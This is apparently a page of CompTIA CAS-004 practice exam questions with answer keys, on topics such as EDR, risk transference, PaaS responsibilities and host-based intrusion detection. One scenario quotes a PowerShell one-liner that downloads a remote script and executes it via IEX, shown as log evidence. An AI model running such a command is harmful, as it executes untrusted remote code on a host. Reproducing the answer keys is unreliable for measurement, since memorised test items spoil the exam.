Cisco®
Oracle
CompTIA
Checkpoint
ISC
EC-Council
EXIN
Fortinet
ITIL®
Juniper
Microsoft
VMware
Avaya
SAP
Google
Salesforce
Amazon
Palo Alto Networks
ISC2
Splunk®
All Vendors
  2. Home
  3. Exams
  4. CompTIA
  5. CAS-004

Free CompTIA CAS-004 Exam Questions (page: 29)

Page 29 of 159
PDF with 645 Questions

A security analyst has noticed a steady increase in the number of failed login attempts to the external-facing mail server. During an investigation of one of the jump boxes, the analyst identified the following in the log file: powershell `IEX(New-Object Net.WebClient).DownloadString ('https://content.comptia.org/casp/whois.psl');whois`
Which of the following security controls would have alerted and prevented the next phase of the attack?

  1. Antivirus and UEBA
  2. Reverse proxy and sandbox
  3. EDR and application approved list
  4. Forward proxy and MFA

Answer(s): C



As part of its risk strategy, a company is considering buying insurance for cybersecurity incidents.
Which of the following BEST describes this kind of risk response?

  1. Risk rejection
  2. Risk mitigation
  3. Risk transference
  4. Risk avoidance

Answer(s): C


Reference:

https://hbr.org/2021/01/cybersecurity-insurance-has-a-big-problem



A DevOps team has deployed databases, event-driven services, and an API gateway as PaaS solution that will support a new billing system.
Which of the following security responsibilities will the DevOps team need to perform?

  1. Securely configure the authentication mechanisms.
  2. Patch the infrastructure at the operating system.
  3. Execute port scanning against the services.
  4. Upgrade the service as part of life-cycle management.

Answer(s): A



A company's Chief Information Officer wants to implement IDS software onto the current system's architecture to provide an additional layer of security. The software must be able to monitor system activity, provide information on attempted attacks, and provide analysis of malicious activities to determine the processes or users involved.
Which of the following would provide this information?

  1. HIPS
  2. UEBA
  3. HIDS
  4. NIDS

Answer(s): C


Reference:

https://www.sciencedirect.com/topics/computer-science/host-based-intrusion-detection-systems



Viewing page 29 of 159



Post your Comments and Discuss CompTIA CAS-004 exam prep with other Community members:

CAS-004 Exam Discussions & Posts